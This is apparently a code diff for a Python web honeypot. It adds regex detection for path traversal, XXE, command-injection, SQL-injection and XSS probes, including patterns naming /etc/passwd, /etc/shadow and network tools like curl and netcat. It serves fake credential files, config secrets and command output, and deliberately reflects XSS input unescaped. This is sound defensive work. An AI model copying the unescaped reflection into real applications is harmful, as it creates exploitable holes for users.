# response = requests.get(api_url, headers=headers, params=params)
# payload = response.json()
# if payload["results"]:
# data = payload["results"][0]
# country_iso_code = data["geoip_data"]["country_iso_code"]
# asn = data["geoip_data"]["asn_autonomous_system_number"]
# asn_org = data["geoip_data"]["asn_autonomous_system_organization"]
# list_on = data["list_on"]
# sanitized_country_iso_code = sanitize_for_storage(country_iso_code, 3)
# sanitized_asn = sanitize_for_storage(asn, 100)
# sanitized_asn_org = sanitize_for_storage(asn_org, 100)
# sanitized_list_on = sanitize_dict(list_on, 100000)
# self._db_manager.update_ip_rep_infos(ip, sanitized_country_iso_code, sanitized_asn, sanitized_asn_org, sanitized_list_on)
# return

View File

@@ -207,6 +207,7 @@ class DatabaseManager:
        is_honeypot_trigger: bool = False,
        attack_types: Optional[List[str]] = None,
        matched_patterns: Optional[Dict[str, str]] = None,
+       raw_request: Optional[str] = None,
    ) -> Optional[int]:
        """
        Persist an access log entry to the database.
@@ -220,6 +221,7 @@ class DatabaseManager:
            is_honeypot_trigger: Whether a honeypot path was accessed
            attack_types: List of detected attack types
            matched_patterns: Dict mapping attack_type to matched pattern
+           raw_request: Full raw HTTP request for forensic analysis

        Returns:
            The ID of the created AccessLog record, or None on error
@@ -235,6 +237,7 @@ class DatabaseManager:
                is_suspicious=is_suspicious,
                is_honeypot_trigger=is_honeypot_trigger,
                timestamp=datetime.now(),
+               raw_request=raw_request,
            )
            session.add(access_log)
            session.flush()  # Get the ID before committing
@@ -1606,7 +1609,10 @@ class DatabaseManager:
            sort_order.lower() if sort_order.lower() in {"asc", "desc"} else "desc"
        )

-       # Get all access logs with attack detections
+       # Count total attacks first (efficient)
+       total_attacks = session.query(AccessLog).join(AttackDetection).count()
+
+       # Get paginated access logs with attack detections
        query = session.query(AccessLog).join(AttackDetection)

        if sort_by == "timestamp":
@@ -1619,30 +1625,27 @@ class DatabaseManager:
                query = query.order_by(
                    AccessLog.ip.desc() if sort_order == "desc" else AccessLog.ip.asc()
                )
            # Note: attack_type sorting requires loading all data, so we skip it for performance
            # elif sort_by == "attack_type":
            #     Can't efficiently sort by related table field

            # Apply LIMIT and OFFSET at database level
            logs = query.offset(offset).limit(page_size).all()

            # Convert to attack list
            paginated = [
                {
                    "id": log.id,
                    "ip": log.ip,
                    "path": log.path,
                    "user_agent": log.user_agent,
                    "timestamp": log.timestamp.isoformat() if log.timestamp else None,
                    "attack_types": [d.attack_type for d in log.attack_detections],
                    "raw_request": log.raw_request,  # Keep for backward compatibility
                }
                for log in logs
            ]
            total_pages = (total_attacks + page_size - 1) // page_size

            return {
@@ -1657,6 +1660,60 @@ class DatabaseManager:
        finally:
            self.close_session()
    def get_raw_request_by_id(self, log_id: int) -> Optional[str]:
        """
        Retrieve raw HTTP request for a specific access log ID.

        Args:
            log_id: The access log ID

        Returns:
            The raw request string, or None if not found or not available
        """
        session = self.session
        try:
            access_log = session.query(AccessLog).filter(AccessLog.id == log_id).first()
            if access_log:
                return access_log.raw_request
            return None
        finally:
            self.close_session()
    def get_attack_types_stats(self, limit: int = 20) -> Dict[str, Any]:
        """
        Get aggregated statistics for attack types (efficient for large datasets).

        Args:
            limit: Maximum number of attack types to return

        Returns:
            Dictionary with attack type counts
        """
        session = self.session
        try:
            from sqlalchemy import func

            # Aggregate attack types with count
            results = (
                session.query(
                    AttackDetection.attack_type,
                    func.count(AttackDetection.id).label('count'),
                )
                .group_by(AttackDetection.attack_type)
                .order_by(func.count(AttackDetection.id).desc())
                .limit(limit)
                .all()
            )
            return {
                "attack_types": [
                    {"type": row.attack_type, "count": row.count}
                    for row in results
                ]
            }
        finally:
            self.close_session()
# Module-level singleton instance
_db_manager = DatabaseManager()
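The `get_attack_types_stats` method above is a plain `GROUP BY`/`COUNT` aggregation. As a minimal, self-contained sketch of the same query shape using the stdlib `sqlite3` module (the table layout here is illustrative, not Krawl's actual schema):

```python
import sqlite3

# In-memory stand-in for the attack_detections table (illustrative schema)
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE attack_detections (id INTEGER PRIMARY KEY, attack_type TEXT)")
conn.executemany(
    "INSERT INTO attack_detections (attack_type) VALUES (?)",
    [("sql_injection",), ("sql_injection",), ("xss_attempt",),
     ("path_traversal",), ("sql_injection",)],
)

# Same shape as the SQLAlchemy query: count per type, most frequent first, capped by limit
rows = conn.execute(
    "SELECT attack_type, COUNT(id) AS count "
    "FROM attack_detections GROUP BY attack_type "
    "ORDER BY count DESC LIMIT ?",
    (20,),
).fetchall()
stats = {"attack_types": [{"type": t, "count": c} for t, c in rows]}
```

The aggregation runs entirely in the database, which is why it stays cheap even when the access-log table is large.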

src/deception_responses.py Normal file

@@ -0,0 +1,617 @@
#!/usr/bin/env python3
import re
import random
import logging
import json
from typing import Optional, Tuple, Dict

from generators import random_username, random_password, random_email
from wordlists import get_wordlists

logger = logging.getLogger('krawl')
def detect_path_traversal(path: str, query: str = "", body: str = "") -> bool:
    """Detect path traversal attempts in request"""
    full_input = f"{path} {query} {body}"
    wl = get_wordlists()
    pattern = wl.attack_patterns.get("path_traversal", "")
    if not pattern:
        # Fallback pattern if wordlists not loaded
        pattern = r'(\.\.|%2e%2e|/etc/passwd|/etc/shadow)'
    if re.search(pattern, full_input, re.IGNORECASE):
        logger.debug(f"Path traversal detected in {full_input[:100]}")
        return True
    return False
def detect_xxe_injection(body: str) -> bool:
    """Detect XXE injection attempts in XML payloads"""
    if not body:
        return False
    wl = get_wordlists()
    pattern = wl.attack_patterns.get("xxe_injection", "")
    if not pattern:
        # Fallback pattern if wordlists not loaded
        pattern = r'(<!ENTITY|<!DOCTYPE|SYSTEM|PUBLIC|file://)'
    if re.search(pattern, body, re.IGNORECASE):
        return True
    return False
def detect_command_injection(path: str, query: str = "", body: str = "") -> bool:
    """Detect command injection attempts"""
    full_input = f"{path} {query} {body}"
    logger.debug(f"[CMD_INJECTION_CHECK] path='{path}' query='{query}' body='{body[:50] if body else ''}'")
    logger.debug(f"[CMD_INJECTION_CHECK] full_input='{full_input[:200]}'")
    wl = get_wordlists()
    pattern = wl.attack_patterns.get("command_injection", "")
    if not pattern:
        # Fallback pattern if wordlists not loaded; word boundaries keep short
        # command names like "id" or "ls" from matching inside ordinary words
        pattern = r'(cmd=|exec=|command=|&&|;|\||\bwhoami\b|\bid\b|\buname\b|\bcat\b|\bls\b)'
    if re.search(pattern, full_input, re.IGNORECASE):
        logger.debug("[CMD_INJECTION_CHECK] Command injection pattern matched!")
        return True
    logger.debug("[CMD_INJECTION_CHECK] No command injection detected")
    return False
def generate_fake_passwd() -> str:
    """Generate fake /etc/passwd content"""
    wl = get_wordlists()
    passwd_config = wl.fake_passwd
    if not passwd_config:
        # Fallback
        return "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin"
    users = passwd_config.get("system_users", [])
    uid_min = passwd_config.get("uid_min", 1000)
    uid_max = passwd_config.get("uid_max", 2000)
    gid_min = passwd_config.get("gid_min", 1000)
    gid_max = passwd_config.get("gid_max", 2000)
    shells = passwd_config.get("shells", ["/bin/bash"])
    fake_users = [
        f"{random_username()}:x:{random.randint(uid_min, uid_max)}:{random.randint(gid_min, gid_max)}::/home/{random_username()}:{random.choice(shells)}"
        for _ in range(3)
    ]
    return "\n".join(users + fake_users)
def generate_fake_shadow() -> str:
    """Generate fake /etc/shadow content"""
    wl = get_wordlists()
    shadow_config = wl.fake_shadow
    if not shadow_config:
        # Fallback
        return "root:$6$rounds=656000$fake_salt_here$fake_hash_data:19000:0:99999:7:::"
    entries = shadow_config.get("system_entries", [])
    hash_prefix = shadow_config.get("hash_prefix", "$6$rounds=656000$")
    salt_length = shadow_config.get("salt_length", 16)
    hash_length = shadow_config.get("hash_length", 86)
    fake_entries = [
        f"{random_username()}:{hash_prefix}{''.join(random.choices('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789', k=salt_length))}${''.join(random.choices('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789', k=hash_length))}:19000:0:99999:7:::"
        for _ in range(3)
    ]
    return "\n".join(entries + fake_entries)
def generate_fake_config_file(filename: str) -> str:
    """Generate fake configuration file content"""
    configs = {
        "config.php": """<?php
define('DB_HOST', 'localhost');
define('DB_NAME', 'app_database');
define('DB_USER', 'db_user');
define('DB_PASSWORD', 'fake_pass_123');
define('SECRET_KEY', 'fake_secret_key_xyz789');
define('API_ENDPOINT', 'https://api.example.com');
?>""",
        "application.properties": """# Database Configuration
spring.datasource.url=jdbc:mysql://localhost:3306/appdb
spring.datasource.username=dbuser
spring.datasource.password=fake_password_123
server.port=8080
jwt.secret=fake_jwt_secret_key_456""",
        ".env": """DB_HOST=localhost
DB_PORT=3306
DB_NAME=production_db
DB_USER=app_user
DB_PASSWORD=fake_env_password_789
API_KEY=fake_api_key_abc123
SECRET_TOKEN=fake_secret_token_xyz""",
    }
    for key in configs:
        if key.lower() in filename.lower():
            return configs[key]
    return f"""# Configuration File
api_endpoint = https://api.example.com
api_key = fake_key_{random.randint(1000, 9999)}
database_url = mysql://user:fake_pass@localhost/db
secret = fake_secret_{random.randint(10000, 99999)}
"""
def generate_fake_directory_listing(path: str) -> str:
    """Generate fake directory listing"""
    wl = get_wordlists()
    dir_config = wl.directory_listing
    if not dir_config:
        # Fallback
        return f"<html><head><title>Index of {path}</title></head><body><h1>Index of {path}</h1></body></html>"
    fake_dirs = dir_config.get("fake_directories", [])
    fake_files = dir_config.get("fake_files", [])
    directories = [(d["name"], d["size"], d["perms"]) for d in fake_dirs]
    files = [
        (f["name"], str(random.randint(f["size_min"], f["size_max"])), f["perms"])
        for f in fake_files
    ]
    html = f"<html><head><title>Index of {path}</title></head><body>"
    html += f"<h1>Index of {path}</h1><hr><pre>"
    html += f"{'Name':<40} {'Size':<10} {'Permissions':<15}\n"
    html += "-" * 70 + "\n"
    for name, size, perms in directories:
        html += f"{name + '/':<40} {size:<10} {perms:<15}\n"
    for name, size, perms in files:
        html += f"{name:<40} {size:<10} {perms:<15}\n"
    html += "</pre><hr></body></html>"
    return html
def generate_path_traversal_response(path: str) -> Tuple[str, str, int]:
    """Generate fake response for path traversal attempts"""
    path_lower = path.lower()
    logger.debug(f"Generating path traversal response for: {path}")
    if "passwd" in path_lower:
        logger.debug("Returning fake passwd file")
        return (generate_fake_passwd(), "text/plain", 200)
    if "shadow" in path_lower:
        logger.debug("Returning fake shadow file")
        return (generate_fake_shadow(), "text/plain", 200)
    if any(ext in path_lower for ext in [".conf", ".config", ".php", ".env", ".properties"]):
        logger.debug("Returning fake config file")
        return (generate_fake_config_file(path), "text/plain", 200)
    if "proc/self" in path_lower:
        logger.debug("Returning fake proc info")
        return (f"{random.randint(1000, 9999)}", "text/plain", 200)
    logger.debug("Returning fake directory listing")
    return (generate_fake_directory_listing(path), "text/html", 200)
def generate_xxe_response(body: str) -> Tuple[str, str, int]:
    """Generate fake response for XXE injection attempts"""
    wl = get_wordlists()
    xxe_config = wl.xxe_responses
    if "file://" in body:
        if "passwd" in body:
            content = generate_fake_passwd()
        elif "shadow" in body:
            content = generate_fake_shadow()
        else:
            content = xxe_config.get("default_content", "root:x:0:0:root:/root:/bin/bash") if xxe_config else "root:x:0:0:root:/root:/bin/bash"
        if xxe_config and "file_access" in xxe_config:
            template = xxe_config["file_access"]["template"]
            response = template.replace("{content}", content)
        else:
            response = f"""<?xml version="1.0"?>
<response>
    <status>success</status>
    <data>{content}</data>
</response>"""
        return (response, "application/xml", 200)
    if "ENTITY" in body:
        if xxe_config and "entity_processed" in xxe_config:
            template = xxe_config["entity_processed"]["template"]
            entity_values = xxe_config["entity_processed"]["entity_values"]
            entity_value = random.choice(entity_values)
            response = template.replace("{entity_value}", entity_value)
        else:
            response = """<?xml version="1.0"?>
<response>
    <status>success</status>
    <message>Entity processed successfully</message>
    <entity_value>fake_entity_content_12345</entity_value>
</response>"""
        return (response, "application/xml", 200)
    if xxe_config and "error" in xxe_config:
        template = xxe_config["error"]["template"]
        messages = xxe_config["error"]["messages"]
        message = random.choice(messages)
        response = template.replace("{message}", message)
    else:
        response = """<?xml version="1.0"?>
<response>
    <status>error</status>
    <message>External entity processing disabled</message>
</response>"""
    return (response, "application/xml", 200)
def generate_command_injection_response(input_text: str) -> Tuple[str, str, int]:
    """Generate fake command execution output"""
    wl = get_wordlists()
    cmd_config = wl.command_outputs
    input_lower = input_text.lower()
    # id command
    if re.search(r'\bid\b', input_lower):
        if cmd_config and "id" in cmd_config:
            uid = random.randint(cmd_config.get("uid_min", 1000), cmd_config.get("uid_max", 2000))
            gid = random.randint(cmd_config.get("gid_min", 1000), cmd_config.get("gid_max", 2000))
            template = random.choice(cmd_config["id"])
            output = template.replace("{uid}", str(uid)).replace("{gid}", str(gid))
        else:
            output = f"uid={random.randint(1000, 2000)}(www-data) gid={random.randint(1000, 2000)}(www-data) groups={random.randint(1000, 2000)}(www-data)"
        return (output, "text/plain", 200)
    # whoami command
    if re.search(r'\bwhoami\b', input_lower):
        users = cmd_config.get("whoami", ["www-data"]) if cmd_config else ["www-data"]
        return (random.choice(users), "text/plain", 200)
    # uname command
    if re.search(r'\buname\b', input_lower):
        outputs = cmd_config.get("uname", ["Linux server 5.4.0 x86_64"]) if cmd_config else ["Linux server 5.4.0 x86_64"]
        return (random.choice(outputs), "text/plain", 200)
    # pwd command
    if re.search(r'\bpwd\b', input_lower):
        paths = cmd_config.get("pwd", ["/var/www/html"]) if cmd_config else ["/var/www/html"]
        return (random.choice(paths), "text/plain", 200)
    # ls command
    if re.search(r'\bls\b', input_lower):
        if cmd_config and "ls" in cmd_config:
            files = random.choice(cmd_config["ls"])
        else:
            files = ["index.php", "config.php", "uploads"]
        # Clamp the sample size so short file lists cannot crash random.sample
        k_min = min(3, len(files))
        k_max = min(6, len(files))
        output = "\n".join(random.sample(files, k=random.randint(k_min, k_max)))
        return (output, "text/plain", 200)
    # cat command
    if re.search(r'\bcat\b', input_lower):
        if "passwd" in input_lower:
            return (generate_fake_passwd(), "text/plain", 200)
        if "shadow" in input_lower:
            return (generate_fake_shadow(), "text/plain", 200)
        cat_content = cmd_config.get("cat_config", "<?php\n$config = 'fake';\n?>") if cmd_config else "<?php\n$config = 'fake';\n?>"
        return (cat_content, "text/plain", 200)
    # echo command
    if re.search(r'\becho\b', input_lower):
        match = re.search(r'echo\s+(.+?)(?:[;&|]|$)', input_text, re.IGNORECASE)
        if match:
            return (match.group(1).strip('"\''), "text/plain", 200)
        return ("", "text/plain", 200)
    # network commands
    if any(cmd in input_lower for cmd in ['wget', 'curl', 'nc', 'netcat']):
        if cmd_config and "network_commands" in cmd_config:
            outputs = cmd_config["network_commands"]
            output = random.choice(outputs)
            if "{size}" in output:
                size = random.randint(cmd_config.get("download_size_min", 100), cmd_config.get("download_size_max", 10000))
                output = output.replace("{size}", str(size))
        else:
            outputs = ["bash: command not found", "Connection timeout"]
            output = random.choice(outputs)
        return (output, "text/plain", 200)
    # generic outputs
    if cmd_config and "generic" in cmd_config:
        generic_outputs = cmd_config["generic"]
        output = random.choice(generic_outputs)
        if "{num}" in output:
            output = output.replace("{num}", str(random.randint(1, 99)))
    else:
        generic_outputs = ["", "Command executed successfully", "sh: syntax error"]
        output = random.choice(generic_outputs)
    return (output, "text/plain", 200)
def detect_sql_injection_pattern(query_string: str) -> Optional[str]:
    """Detect SQL injection patterns in query string"""
    if not query_string:
        return None
    query_lower = query_string.lower()
    patterns = {
        "quote": [r"'", r'"', r"`"],
        "comment": [r"--", r"#", r"/\*", r"\*/"],
        "union": [r"\bunion\b", r"\bunion\s+select\b"],
        "boolean": [r"\bor\b.*=.*", r"\band\b.*=.*", r"'.*or.*'.*=.*'"],
        "time_based": [r"\bsleep\b", r"\bwaitfor\b", r"\bdelay\b", r"\bbenchmark\b"],
        "stacked": [r";.*select", r";.*drop", r";.*insert", r";.*update", r";.*delete"],
        "command": [r"\bexec\b", r"\bexecute\b", r"\bxp_cmdshell\b"],
        "info_schema": [r"information_schema", r"table_schema", r"table_name"],
    }
    for injection_type, pattern_list in patterns.items():
        for pattern in pattern_list:
            if re.search(pattern, query_lower):
                logger.debug(f"SQL injection pattern '{injection_type}' detected")
                return injection_type
    return None
def get_random_sql_error(db_type: str = None, injection_type: str = None) -> Tuple[str, str]:
    """Generate a random SQL error message"""
    wl = get_wordlists()
    sql_errors = wl.sql_errors
    if not sql_errors:
        return ("Database error occurred", "text/plain")
    if not db_type:
        db_type = random.choice(list(sql_errors.keys()))
    db_errors = sql_errors.get(db_type, {})
    if injection_type and injection_type in db_errors:
        errors = db_errors[injection_type]
    elif "generic" in db_errors:
        errors = db_errors["generic"]
    else:
        all_errors = []
        for error_list in db_errors.values():
            if isinstance(error_list, list):
                all_errors.extend(error_list)
        errors = all_errors if all_errors else ["Database error occurred"]
    error_message = random.choice(errors) if errors else "Database error occurred"
    if "{table}" in error_message:
        tables = ["users", "products", "orders", "customers", "accounts", "sessions"]
        error_message = error_message.replace("{table}", random.choice(tables))
    if "{column}" in error_message:
        columns = ["id", "name", "email", "password", "username", "created_at"]
        error_message = error_message.replace("{column}", random.choice(columns))
    return (error_message, "text/plain")
def generate_sql_error_response(query_string: str, db_type: str = None) -> Tuple[Optional[str], Optional[str], Optional[int]]:
    """Generate SQL error response for detected injection attempts"""
    injection_type = detect_sql_injection_pattern(query_string)
    if not injection_type:
        return (None, None, None)
    error_message, content_type = get_random_sql_error(db_type, injection_type)
    status_code = 500
    if random.random() < 0.3:
        status_code = 200
    logger.info(f"SQL injection detected: {injection_type}")
    return (error_message, content_type, status_code)
def get_sql_response_with_data(path: str, params: str) -> str:
    """Generate fake SQL query response with data"""
    injection_type = detect_sql_injection_pattern(params)
    if injection_type in ["union", "boolean", "stacked"]:
        data = {
            "success": True,
            "results": [
                {
                    "id": i,
                    "username": random_username(),
                    "email": random_email(),
                    "password_hash": random_password(),
                    "role": random.choice(["admin", "user", "moderator"]),
                }
                for i in range(1, random.randint(2, 5))
            ],
        }
        return json.dumps(data, indent=2)
    return json.dumps(
        {"success": True, "message": "Query executed successfully", "results": []},
        indent=2,
    )
def detect_xss_pattern(input_string: str) -> bool:
    """Detect XSS patterns in input"""
    if not input_string:
        return False
    wl = get_wordlists()
    xss_pattern = wl.attack_patterns.get("xss_attempt", "")
    if not xss_pattern:
        xss_pattern = r"(<script|</script|javascript:|onerror=|onload=|onclick=|<iframe|<img|<svg|eval\(|alert\()"
    detected = bool(re.search(xss_pattern, input_string, re.IGNORECASE))
    if detected:
        logger.debug("XSS pattern detected in input")
    return detected
def generate_xss_response(input_data: dict) -> str:
    """Generate response for XSS attempts with reflected content"""
    xss_detected = False
    reflected_content = []
    for key, value in input_data.items():
        if detect_xss_pattern(value):
            xss_detected = True
            reflected_content.append(f"<p><strong>{key}:</strong> {value}</p>")
    if xss_detected:
        logger.info("XSS attempt detected and reflected")
        html = f"""
<!DOCTYPE html>
<html>
<head>
    <title>Submission Received</title>
    <style>
        body {{ font-family: Arial, sans-serif; max-width: 600px; margin: 50px auto; padding: 20px; }}
        .success {{ background: #d4edda; padding: 20px; border-radius: 8px; border: 1px solid #c3e6cb; }}
        h2 {{ color: #155724; }}
        p {{ margin: 10px 0; }}
    </style>
</head>
<body>
    <div class="success">
        <h2>Thank you for your submission!</h2>
        <p>We have received your information:</p>
        {''.join(reflected_content)}
        <p><em>We will get back to you shortly.</em></p>
    </div>
</body>
</html>
"""
        return html
    return """
<!DOCTYPE html>
<html>
<head>
    <title>Submission Received</title>
    <style>
        body { font-family: Arial, sans-serif; max-width: 600px; margin: 50px auto; padding: 20px; }
        .success { background: #d4edda; padding: 20px; border-radius: 8px; border: 1px solid #c3e6cb; }
        h2 { color: #155724; }
    </style>
</head>
<body>
    <div class="success">
        <h2>Thank you for your submission!</h2>
        <p>Your message has been received and we will respond soon.</p>
    </div>
</body>
</html>
"""
def generate_server_error() -> Tuple[str, str]:
    """Generate fake server error page"""
    wl = get_wordlists()
    server_errors = wl.server_errors
    if not server_errors:
        return ("500 Internal Server Error", "text/html")
    server_type = random.choice(list(server_errors.keys()))
    server_config = server_errors[server_type]
    error_codes = {
        400: "Bad Request",
        401: "Unauthorized",
        403: "Forbidden",
        404: "Not Found",
        500: "Internal Server Error",
        502: "Bad Gateway",
        503: "Service Unavailable",
    }
    code = random.choice(list(error_codes.keys()))
    message = error_codes[code]
    template = server_config.get("template", "")
    version = random.choice(server_config.get("versions", ["1.0"]))
    html = template.replace("{code}", str(code))
    html = html.replace("{message}", message)
    html = html.replace("{version}", version)
    if server_type == "apache":
        os = random.choice(server_config.get("os", ["Ubuntu"]))
        html = html.replace("{os}", os)
    html = html.replace("{host}", "localhost")
    logger.debug(f"Generated {server_type} server error: {code}")
    return (html, "text/html")
def get_server_header(server_type: str = None) -> str:
    """Get a fake server header string"""
    wl = get_wordlists()
    server_errors = wl.server_errors
    if not server_errors:
        return "nginx/1.18.0"
    if not server_type:
        server_type = random.choice(list(server_errors.keys()))
    server_config = server_errors.get(server_type, {})
    version = random.choice(server_config.get("versions", ["1.0"]))
    server_headers = {
        "nginx": f"nginx/{version}",
        "apache": f"Apache/{version}",
        "iis": f"Microsoft-IIS/{version}",
        "tomcat": "Apache-Coyote/1.1",
    }
    return server_headers.get(server_type, "nginx/1.18.0")
def detect_and_respond_deception(path: str, query: str = "", body: str = "", method: str = "GET") -> Optional[Tuple[str, str, int]]:
    """
    Main deception detection and response function.
    Returns (response_body, content_type, status_code) if deception should be applied, None otherwise.
    """
    logger.debug(f"Checking deception for {method} {path} query={query[:50] if query else 'empty'}")
    if detect_path_traversal(path, query, body):
        logger.info(f"Path traversal detected in: {path}")
        return generate_path_traversal_response(f"{path}?{query}" if query else path)
    if body and detect_xxe_injection(body):
        logger.info("XXE injection detected")
        return generate_xxe_response(body)
    if detect_command_injection(path, query, body):
        logger.info(f"Command injection detected in: {path}")
        full_input = f"{path} {query} {body}"
        return generate_command_injection_response(full_input)
    return None
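The detection helpers above degrade to hard-coded regex fallbacks when the wordlists are unavailable. A self-contained sketch of those fallback checks (patterns copied verbatim from the code above, without any wordlist loading):

```python
import re

# Fallback patterns as used above when wordlists are not loaded
PATH_TRAVERSAL = r'(\.\.|%2e%2e|/etc/passwd|/etc/shadow)'
XXE = r'(<!ENTITY|<!DOCTYPE|SYSTEM|PUBLIC|file://)'

def is_path_traversal(s: str) -> bool:
    # Case-insensitive search, same as detect_path_traversal's fallback branch
    return bool(re.search(PATH_TRAVERSAL, s, re.IGNORECASE))

def is_xxe(s: str) -> bool:
    # Same shape as detect_xxe_injection's fallback branch
    return bool(re.search(XXE, s, re.IGNORECASE))

hits = [
    is_path_traversal("/download?file=..%2f..%2fetc/passwd"),  # dot-dot sequence
    is_path_traversal("/index.html"),                          # benign path
    is_xxe('<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY x SYSTEM "file:///etc/passwd">]>'),
]
```

Note that these broad patterns trade precision for coverage: in a honeypot a false positive just serves a fake page, so erring toward matching is acceptable.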

View File

@@ -6,7 +6,7 @@ import time
from datetime import datetime
from http.server import BaseHTTPRequestHandler
from typing import Optional, List
from urllib.parse import urlparse, parse_qs, unquote_plus
import json
import os
@@ -19,7 +19,6 @@ from firewall.iptables import Iptables
from firewall.raw import Raw
from tracker import AccessTracker
from templates import html_templates
from templates.dashboard_template import generate_dashboard
from generators import (
@@ -32,9 +31,14 @@ from generators import (
    random_server_header,
)
from wordlists import get_wordlists
from deception_responses import (
    detect_and_respond_deception,
    generate_sql_error_response,
    get_sql_response_with_data,
    detect_xss_pattern,
    generate_xss_response,
    generate_server_error,
)
from models import AccessLog
from ip_utils import is_valid_public_ip
from sqlalchemy import distinct
@@ -46,7 +50,6 @@ class Handler(BaseHTTPRequestHandler):
    webpages: Optional[List[str]] = None
    config: Config = None
    tracker: AccessTracker = None
    counter: int = 0
    app_logger: logging.Logger = None
    access_logger: logging.Logger = None
@@ -70,6 +73,28 @@ class Handler(BaseHTTPRequestHandler):
            # Fallback to direct connection IP
            return self.client_address[0]
    def _build_raw_request(self, body: str = "") -> str:
        """Build raw HTTP request string for forensic analysis"""
        try:
            # Request line
            raw = f"{self.command} {self.path} {self.request_version}\r\n"
            # Headers
            if hasattr(self, "headers") and self.headers:
                for header, value in self.headers.items():
                    raw += f"{header}: {value}\r\n"
            raw += "\r\n"
            # Body (if present)
            if body:
                raw += body
            return raw
        except Exception as e:
            # Fallback to minimal representation if building fails
            return f"{self.command} {self.path} (error building full request: {str(e)})"
    def _get_category_by_ip(self, client_ip: str) -> str:
        """Get the category of an IP from the database"""
        return self.tracker.get_category_by_ip(client_ip)
@@ -113,7 +138,8 @@ class Handler(BaseHTTPRequestHandler):
            return False
        try:
            parsed_url = urlparse(path)
            request_query = parsed_url.query

            # Log SQL injection attempt
            client_ip = self._get_client_ip()
@@ -163,6 +189,64 @@ class Handler(BaseHTTPRequestHandler):
                pass
        return True
    def _handle_deception_response(self, path: str, query: str = "", body: str = "", method: str = "GET") -> bool:
        """
        Handle deception responses for path traversal, XXE, and command injection.
        Returns True if a deception response was sent, False otherwise.
        """
        try:
            self.app_logger.debug(f"Checking deception for: {method} {path}")
            result = detect_and_respond_deception(path, query, body, method)
            if result:
                response_body, content_type, status_code = result
                client_ip = self._get_client_ip()
                user_agent = self.headers.get("User-Agent", "")

                # Determine attack type using standardized names from wordlists
                full_input = f"{path} {query} {body}".lower()
                attack_type_db = None  # For database (standardized)
                attack_type_log = "UNKNOWN"  # For logging (human-readable)
                if "passwd" in path.lower() or "shadow" in path.lower() or ".." in path or ".." in query:
                    attack_type_db = "path_traversal"
                    attack_type_log = "PATH_TRAVERSAL"
                elif body and ("<!DOCTYPE" in body or "<!ENTITY" in body):
                    attack_type_db = "xxe_injection"
                    attack_type_log = "XXE_INJECTION"
                elif any(pattern in full_input for pattern in ['cmd=', 'exec=', 'command=', 'execute=', 'system=', ';', '|', '&&', 'whoami', 'id', 'uname', 'cat', 'ls', 'pwd']):
                    attack_type_db = "command_injection"
                    attack_type_log = "COMMAND_INJECTION"

                # Log the attack
                self.access_logger.warning(
                    f"[{attack_type_log} DETECTED] {client_ip} - {path[:100]} - Method: {method}"
                )

                # Record access before responding (deception returns early)
                self.tracker.record_access(
                    ip=client_ip,
                    path=path,
                    user_agent=user_agent,
                    body=body,
                    method=method,
                    raw_request=self._build_raw_request(body)
                )

                # Send the deception response
                self.send_response(status_code)
                self.send_header("Content-type", content_type)
                self.end_headers()
                self.wfile.write(response_body.encode())
                return True
        except BrokenPipeError:
            return True
        except Exception as e:
            self.app_logger.error(f"Error handling deception response for {path}: {str(e)}")
        return False
    def generate_page(self, seed: str, page_visit_count: int) -> str:
        """Generate a webpage containing random links or canary token"""
@@ -246,13 +330,19 @@ class Handler(BaseHTTPRequestHandler):
        base_path = urlparse(self.path).path

        content_length = int(self.headers.get("Content-Length", 0))
        post_data = ""  # default when the request carries no body
        if content_length > 0:
            post_data = self.rfile.read(content_length).decode(
                "utf-8", errors="replace"
            )

        parsed_url = urlparse(self.path)
        query_string = parsed_url.query
        if self._handle_deception_response(self.path, query_string, post_data, "POST"):
            return

        if base_path in ["/api/search", "/api/sql", "/api/database"]:
            self.access_logger.info(
                f"[SQL ENDPOINT POST] {client_ip} - {base_path} - Data: {post_data[:100] if post_data else 'empty'}"
            )
@@ -283,20 +373,17 @@ class Handler(BaseHTTPRequestHandler):
            return

        if base_path == "/api/contact":
            # Parse URL-encoded POST data properly
            parsed_data = {}
            if post_data:
                # Use parse_qs for proper URL decoding
                parsed_qs = parse_qs(post_data)
                # parse_qs returns lists, get first value of each
                parsed_data = {k: v[0] if v else '' for k, v in parsed_qs.items()}
            self.app_logger.debug(f"Parsed contact data: {parsed_data}")

            xss_detected = any(detect_xss_pattern(str(v)) for v in parsed_data.values())
            if xss_detected:
                self.access_logger.warning(
@@ -307,6 +394,16 @@ class Handler(BaseHTTPRequestHandler):
                    f"[XSS ENDPOINT POST] {client_ip} - {base_path}"
                )
            # Record access for dashboard tracking (including XSS detection)
            self.tracker.record_access(
                ip=client_ip,
                path=self.path,
                user_agent=user_agent,
                body=post_data,
                method="POST",
                raw_request=self._build_raw_request(post_data)
            )
            try:
                self.send_response(200)
                self.send_header("Content-type", "text/html")
@@ -323,12 +420,8 @@ class Handler(BaseHTTPRequestHandler):
            f"[LOGIN ATTEMPT] {client_ip} - {self.path} - {user_agent[:50]}"
        )
        # post_data was already read at the beginning of do_POST, don't read again
        if post_data:
            self.access_logger.warning(f"[POST DATA] {post_data[:200]}")
            # Parse and log credentials
@@ -350,7 +443,8 @@ class Handler(BaseHTTPRequestHandler):
        # send the post data (body) to the record_access function so the post data can be used to detect suspicious things.
        self.tracker.record_access(
            client_ip, self.path, user_agent, post_data, method="POST",
            raw_request=self._build_raw_request(post_data)
        )

        time.sleep(1)
@@ -498,9 +592,14 @@ class Handler(BaseHTTPRequestHandler):
        user_agent = self.headers.get("User-Agent", "")
        request_path = urlparse(self.path).path
        self.app_logger.info(f"request_query: {request_path}")
        parsed_url = urlparse(self.path)
        query_string = parsed_url.query
        query_params = parse_qs(query_string)
        self.app_logger.info(f"query_params: {query_params}")

        if self._handle_deception_response(self.path, query_string, "", "GET"):
            return
        # get database reference
        db = get_database()
        session = db.session
@@ -934,6 +1033,68 @@ class Handler(BaseHTTPRequestHandler):
self.wfile.write(json.dumps({"error": str(e)}).encode()) self.wfile.write(json.dumps({"error": str(e)}).encode())
return return
# API endpoint for attack types statistics (aggregated)
if self.config.dashboard_secret_path and self.path.startswith(
f"{self.config.dashboard_secret_path}/api/attack-types-stats"
):
self.send_response(200)
self.send_header("Content-type", "application/json")
self.send_header("Access-Control-Allow-Origin", "*")
